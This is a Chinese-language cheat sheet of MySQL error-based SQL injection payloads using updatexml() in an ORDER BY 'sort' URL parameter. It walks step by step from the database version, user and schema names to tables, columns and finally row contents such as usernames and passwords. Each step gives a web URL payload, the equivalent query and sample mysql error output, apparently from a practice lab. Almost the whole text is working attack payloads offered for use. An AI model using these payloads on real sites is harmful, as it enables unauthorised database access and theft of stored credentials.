0x00 记忆方式
updatexml(1,concat(0x7e,(payload),0x7e),1)
0x01 爆数据库版本
web语句: http://www.xxx.com/sql.php?sort=id, updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)
数据库语句: select * from test order by id, updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1);
/
数据库执行结果
mysql> select * from users order by id, updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1);
ERROR 1105 (HY000): XPATH syntax error: '~5.5.53~'
0x02 爆当前连接用户
web语句: http://www.xxx.com/sql.php?sort=id, updatexml(1,concat(0x7e,(SELECT user()),0x7e),1);
数据库语句: select * from test order by id, updatexml(1,concat(0x7e,(SELECT user()),0x7e),1);
//
数据库执行结果
mysql> select * from users order by id, updatexml(1,concat(0x7e,(SELECT user()),0x7e),1);
ERROR 1105 (HY000): XPATH syntax error: '~root@localhost~'
0x03 爆当前连接的数据库
web语句: http://www.0-sec.org/sql.php?sort=id, updatexml(1,concat(0x7e,(SELECT database()),0x7e),1);
数据库语句: select * from test order by id, updatexml(1,concat(0x7e,(SELECT database()),0x7e),1);
数据库执行结果
mysql> select * from users order by id, updatexml(1,concat(0x7e,(SELECT database()),0x7e),1);
ERROR 1105 (HY000): XPATH syntax error: '~security~'
0x04 爆库名
注意: LIMIT 0 修改会显示其他库名
例如:
LIMIT 0,1 修改为0 就是出1库
LIMIT 1,1 修改为1 就是出2库
web语句: http://www.xxx.com/sql.php?sort=id,updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1),0x7e),1)
数据库语句: select * from test order by id,updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1),0x7e),1);
数据库执行结果
mysql> select * from users order by id,updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1),0x7e),1);
ERROR 1105 (HY000): XPATH syntax error: '~~information_schema~~'
0x05 爆表名
注意: table_schema=xxx 修改为其他库会查出其他库的数据
例如:
table_schema=database() 会获取当前连接的库数据
table_schema=’test’ 会获取test库数据
注意: LIMIT 0 修改会爆出不同的表名
例如:
LIMIT 0,1 修改为0 就是出1表
LIMIT 1,1 修改为1 就是出2表
web语句: http://www.xxx.com/sql.php?sort=id,updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1),0x7e),1)
数据库语句: select * from test order by id,updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1),0x7e),1);
数据库执行结果
mysql> select * from users order by id,updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1),0x7e),1);
ERROR 1105 (HY000): XPATH syntax error: '~~emails~~'
0x06 爆字段
table_schema = “xx” 要看的数据库名
table_name = “xx” 要看的表名
limit 0 表示要爆的位置
例如:
表tdb_admin的字段为 id,usernam,password
limit 0 = id
limit 1 = username
limit 2 = password
web语句: http://www.xxx.com/sql.php?sort=users, updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_schema=’security’ and table_name=’users’ LIMIT 0,1),0x7e),1)
数据库语句-爆security库 users表的字段名:
select * from users order by id,updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_schema=database() and table_name=’users’ LIMIT 0,1),0x7e),1);
数据库执行结果
mysql> select * from users order by id,updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_schema=database() and table_name='users' LIMIT 0,1),0x7e),1);
ERROR 1105 (HY000): XPATH syntax error: '~~id~~'
0x07 爆内容
注意: limit 0 表示要显示那一条数据
limit 0 表示第一条
limit 1 表示第二条
web语句: http://www.xxx.com/sql.php?sort=id, updatexml(1, concat(0x7e,(SELECT distinct concat(0x7e,字段名,0x3a,字段名,0x3a,字段名,0x7e) FROM 库名.表名 limit 0,1)),1)
数据库语句: select * from test order by id, updatexml(1, concat(0x7e,(SELECT distinct concat(0x7e,字段名,0x3a,字段名,0x3a,字段名,0x7e) FROM 库名.表名 limit 0,1)),1)
/
数据库执行结果:
mysql> select * from users order by id, updatexml(1, concat(0x7e,(SELECT distinct concat(0x7e,id,0x3a,username,0x3a,password,0x7e) FROM security.users limit 0,1)),1);
ERROR 1105 (HY000): XPATH syntax error: '~~1:Dumb:Dumb~'